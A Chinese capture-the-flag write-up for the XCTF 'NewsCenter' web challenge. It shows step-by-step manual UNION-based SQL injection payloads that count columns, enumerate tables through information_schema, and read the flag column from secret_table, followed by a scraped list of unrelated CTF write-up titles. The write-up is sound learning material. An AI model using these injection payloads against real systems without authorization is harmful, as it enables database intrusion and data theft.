题目:

WP:
打开场景看到 search news的字样,只能输入进行操作
预测是一道SQL注入的题目

本题最直接的方法是sqlmap爆一下数据库
然而我对sqlmap的使用并不擅长
大家可以去看看这位大佬yangker12148的WP

我这里用的是简单的手动输入(原因很简单,近期在学数据库sql,就现学现用了)
输入 ' and 0 union select 1#进行字段长度的推测

' and 0 union select 1,2#


' and 0 union select 1,2,3 #


下面用

' and 0 union
select 1,TABLE_SCHEMA,TABLE_NAME
from INFORMATION_SCHEMA.COLUMNS #

查询库中所有表

secret_table?答案不在这还能在哪?
使用

' and 0 union select 1,column_name,data_type from
information_schema.columns
where table_name='secret_table'#


一个熟悉的身影:fl4g
直接查询

' and 0 union select 1,2,fl4g from secret_table #


成功

XCTF Web 高手区007: NewsCenter相关推荐

  1. 20200109攻防世界WEB高手区题目一题多解全教程通关(13-18)

    欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注 目录 013unserialize3 014upload1 015Web_python_tem ...

  2. XCTF MISC 高手区 2017_Dating_in_Singapore

    2017_Dating_in_Singapore 题目给了一串数字和一个日历pdf,联想到这串数字对应日历上的日期,而且数字分为12段,正好对应12个月,所以在日历上将对应的日期连接起来可得flag ...

  3. XCTF MISC 高手区 Dift

    Dift 附件是一张png图片,用foremost分离得到png和一个加密的rar文件,用ARCHPR暴力破解失败. 没有其它可用的信息,压缩包应该是和png图片有关 用010editor打开分离后的 ...

  4. 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp

    文章目录 解题部分 总结: 解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备-没有显示 ...

  5. 攻防世界 web高手进阶区 10分题 weiphp

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...

  6. 攻防世界-web高手进阶区

    文章目录 攻防世界-web高手进阶区 1.baby_web 2.Training-WWW-Robots 3.Web_php_include (文件包含+伪协议) 1.方法 2.方法 4.ics-06( ...

  7. 攻防世界 web高手进阶区 9分题 favorite_number

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...

  8. 攻防世界 web高手进阶区 8分题 Web_python_block_chain

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是Web_python_block_chain的writeup 解题过程 这是个区块链题 这..裂开了啊 没搞过区块链 从零开始学习 ...

  9. 攻防世界 web高手进阶区 9分题 bilibili

    前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是bilibili的writeup 解题过程 进来界面 这尼玛出题人是黑还是粉啊 笑死 看题目意思是买lv6 惯例源码+御剑 没发现什 ...

最新文章

  1. 这5个数学猜想最早在30年前提出,如今AI证明它们都错了
  2. go 用的不多的命令
  3. c语言课程设计走迷宫游戏,C语言课程设计-迷宫游戏.doc
  4. Java黑皮书课后题第4章:*4.9(给出字符的Unicode码)编写程序,得到一个字符的输入,然后显示其Unicode值
  5. 最小生成树算法讨论(转)
  6. Linux下自动化测试环境的搭建
  7. python列表是顺序表还是链表_顺序表与链表
  8. 报错,Error in created hook: “SyntaxError: Unexpected token o in JSON at position 1“
  9. 拳王虚拟项目公社:小白如何从0到1搭建个人私域流量池?6招玩转流量裂变法
  10. python 小甲鱼——面向对象笔记
  11. slqite3库查询数据处理方式_SQLite数据库使用 常用命令
  12. 光环PMP 项目范围管理 、项目进度管理、项目成本管理、项目质量管理
  13. elememt ui 组件 dialog使用备忘
  14. tv.twitch.android,Twitch智能电视客户端
  15. 纸鸢|物联网云平台倒闭的原因和案例
  16. 什么是opc ua通信?opc ua的介绍
  17. 昆石网络 VOS3000虚拟运营支撑系统任意文件读取漏洞
  18. 长安链源码学习--提案(Proposer)(五)
  19. y4m文件转换成yuv
  20. 西安未来国际java,新开工!西安文化CBD国际商业中心来了!2020 级重点建设项目发布...

热门文章

  1. 河北对外经贸职业学院计算机怎么样,河北对外经贸职业学院怎么样、好不好
  2. H5页面底部前进、后退横栏怎么去除?
  3. 关于百度绿萝算法小小思考
  4. android音乐播放器开发在线加载歌词,移动开发平台
  5. SQL学习整理(一)
  6. 上海亚商投顾:沪指窄幅震荡涨0.28% 农业股全天低迷
  7. 戒指带在各个手指代表什么意思?
  8. 腾讯应用宝认领应用步骤(详细)
  9. WordPress建站详细流程,WordPress入门
  10. 网络流量是什么意思?底层原理是什么?